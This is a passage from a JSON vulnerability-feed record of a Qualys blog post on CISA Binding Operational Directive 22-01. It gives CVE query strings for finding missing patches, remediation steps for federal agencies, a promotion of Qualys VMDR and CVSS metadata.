Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[`CVE-2021-1732`,`CVE-2020-1350`,`CVE-2020-1472`,`CVE-2021-26855`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2020-0601`,`CVE-2021-26857`,`CVE-2021-22893`,`CVE-2020-8243`,`CVE-2021-22900`,`CVE-2021-22894`,`CVE-2020-8260`,`CVE-2021-22899`,`CVE-2019-11510`]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding which vulnerabilities exist in your environment is a critical but only partial part of threat mitigation. Qualys VMDR helps customers discover exposure, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. 
Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", 
"CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}